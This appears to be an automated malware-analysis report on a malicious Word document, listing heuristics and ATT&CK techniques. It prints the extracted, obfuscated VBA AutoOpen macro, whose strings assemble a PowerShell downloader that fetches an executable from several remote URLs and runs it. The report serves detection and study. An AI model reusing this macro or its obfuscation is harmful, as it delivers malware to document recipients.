MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro. The AutoOpen subroutine is present, indicating it will execute automatically when the document is opened. The macro attempts to execute a shell command using obfuscated string concatenation, likely to download and run a second-stage payload. The presence of the AutoOpen macro and the execution of shell commands are strong indicators of malicious intent.
Heuristics 5
-
ClamAV: Doc.Malware.Generic-6691363-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6691363-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5244 bytes |
SHA-256: 6ce3a156b6966514d3ab74e3b837ac1f6c25c44257e478442659ea4b91cdad76 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "KqWQqdkFA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Const voNzXTHsmt = 0
Dim lEilE(2)
lEilE(0) = Left(lpjvjnC, 281)
lEilE(1) = Right(uiOtFk, 116)
Dim MwGfoE(3)
MwGfoE(0) = Left(lpjvjnC, 281)
MwGfoE(1) = Right(uiOtFk, 116)
MwGfoE(2) = Right(uiOtFk, 116)
Dim liVtw(3)
liVtw(0) = Mid(XCfwpd, 472, 862)
liVtw(1) = MidB(GPwUfidQ, 854, 299)
liVtw(2) = Left(lpjvjnC, 281)
Dim DzRFKQ(4)
DzRFKQ(0) = Right(uiOtFk, 116)
DzRFKQ(1) = Right(uiOtFk, 116)
DzRFKQ(2) = Mid(XCfwpd, 472, 862)
DzRFKQ(3) = Mid(XCfwpd, 472, 862)
Shell@ cnoVVWI + jnpqdbjuqC + ZaGSNbPYriJ, CInt(voNzXTHsmt)
Dim anmhY(3)
anmhY(0) = Mid(XCfwpd, 472, 862)
anmhY(1) = MidB(GPwUfidQ, 854, 299)
anmhY(2) = Left(lpjvjnC, 281)
Dim QHHQNa(3)
QHHQNa(0) = Left(lpjvjnC, 281)
QHHQNa(1) = Mid(XCfwpd, 472, 862)
QHHQNa(2) = Mid(XCfwpd, 472, 862)
Dim wbDvn(2)
wbDvn(0) = Mid(XCfwpd, 472, 862)
wbDvn(1) = Left(lpjvjnC, 281)
End Sub
Attribute VB_Name = "XLnwoARhBdU"
Function cnoVVWI()
Dim DcrPcj(2)
DcrPcj(0) = Left(lpjvjnC, 281)
DcrPcj(1) = Left(lpjvjnC, 281)
Dim iNYPH(3)
iNYPH(0) = Right(uiOtFk, 116)
iNYPH(1) = Left(lpjvjnC, 281)
iNYPH(2) = Right(uiOtFk, 116)
Dim IwwOw(2)
IwwOw(0) = Right(uiOtFk, 116)
IwwOw(1) = Mid(XCfwpd, 472, 862)
Dim EDGJzT(4)
EDGJzT(0) = Left(lpjvjnC, 281)
EDGJzT(1) = Left(lpjvjnC, 281)
EDGJzT(2) = Mid(XCfwpd, 472, 862)
EDGJzT(3) = Right(uiOtFk, 116)
Dim VoMin(5)
VoMin(0) = Right(uiOtFk, 116)
VoMin(1) = MidB(GPwUfidQ, 854, 299)
VoMin(2) = Left(lpjvjnC, 281)
VoMin(3) = Mid(XCfwpd, 472, 862)
VoMin(4) = Mid(XCfwpd, 472, 862)
KiAswiWYj = Format(Chr(12 + 7 + 5 + 12 + 63)) + "md /V:/" + Format(Chr(8 + 4 + 3 + 8 + 44)) + Format(Chr(4 + 2 + 1 + 4 + 23)) + "s^e^" + "t ^m" + Format(Chr(8 + 4 + 3 + 8 + 44)) + "=^ ^ " + "^ ^ ^ }}^{^h" + Format(Chr(12 + 7 + 5 + 12 + 63)) + "^t^a" + Format(Chr(12 + 7 + 5 + 12 + 63)) + "}^;^k^ae" + "rb^;^B^O^a$^ m^et^" + "I-^e^kov" + "nI^;)BOa^$ " + ",l^wB$(" + "^e^l^i^Fdao^ln^wo^D.TJ^h$^{yr" + "t{)L^GD^$^ n"
Dim UNijm(4)
UNijm(0) = Mid(XCfwpd, 472, 862)
UNijm(1) = Right(uiOtFk, 116)
UNijm(2) = Right(uiOtFk, 116)
UNijm(3) = Left(lpjvjnC, 281)
Dim OMfzM(3)
OMfzM(0) = Left(lpjvjnC, 281)
OMfzM(1) = Left(lpjvjnC, 281)
OMfzM(2) = Left(lpjvjnC, 281)
Dim jURLPs(2)
jURLPs(0) = Right(uiOtFk, 116)
jURLPs(1) = MidB(GPwUfidQ, 854, 299)
Dim NEtaoA(3)
NEtaoA(0) = MidB(GPwUfidQ, 854, 299)
NEtaoA(1) = Mid(XCfwpd, 472, 862)
NEtaoA(2) = Mid(XCfwpd, 472, 862)
puuILaISsPG = "^i^ ^lw" + "B^$(h" + Format(Chr(12 + 7 + 5 + 12 + 63)) + "aer^of^;^'e^x^e^.'+" + "^O^lA$^+'^\^" + "'^+" + Format(Chr(12 + 7 + 5 + 12 + 63)) + "i^l^bup^:vne$^=^BOa$^;'^" + "9^9^3^'" + " ^= ^Ol^A^$" + ";)^'^@^'(til^pS^.^'^i^a" + "f^Zo^O2" + Format(Chr(12 + 7 + 5 + 12 + 63)) + "/^ofn^i.a^y^er^t"
Dim SFADCY(5)
SFADCY(0) = Mid(XCfwpd, 472, 862)
SFADCY(1) = Left(lpjvjnC, 281)
SFADCY(2) = Mid(XCfwpd, 472, 862)
SFADCY(3) = Mid(XCfwpd, 472, 862)
SFADCY(4) = Mid(XCfwpd, 472, 862)
Dim ZqKvL(4)
ZqKvL(0) = MidB(GPwUfidQ, 854, 299)
ZqKvL(1) = Mid(XCfwpd, 472, 862)
ZqKvL(2) = MidB(GPwUfidQ, 854, 299)
ZqKvL(3) = Right(uiOtFk, 116)
Dim iRPiKD(4)
iRPiKD(0) = Left(lpjvjnC, 281)
iRPiKD(1) = Mid(XCfwpd, 472, 862)
iRPiKD(2) = Mid(XCfwpd, 472, 862)
iRPiKD(3) = Left(lpjvjnC, 281)
NnwhBBQbI = "^sa//:p^t^th@wrnw" + "Ngyy^Bz/s^u.^ohs^in//:^p^t^" + "th^@Agl^A^7a2R^pB" + "/r^b.m^o" + Format(Chr(12 + 7 + 5 + 12 + 63)) + ".tra^i^t^po//" + ":^p^tth@^j" + "Q^3^w^k^lw^qG/r^" + "b.^m^o" + Format(Chr(12 + 7 + 5 + 12 + 63)) + ".etrop^u^s^tn//:ptt" + "^h^@19V2^U^Sq^z/rb^.^" + "mo" + Format(Chr(12 + 7 + 5 + 12 + 63)) + "^.fr^o^d^s//:^" + "p^tt^h'" + "=L^GD^$;t" + "neil" + Format(Chr(8 + 4 + 3 + 8 + 44)) + "^beW^.teN" + " ^t" + Format(Chr(12 + 7 + 5 + 12 + 63)) + "^e^jbo"
Dim ulIRo(4)
ulIRo(0) = Right(uiOtFk, 116)
ulIRo(1) = Right(uiOtFk, 116)
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.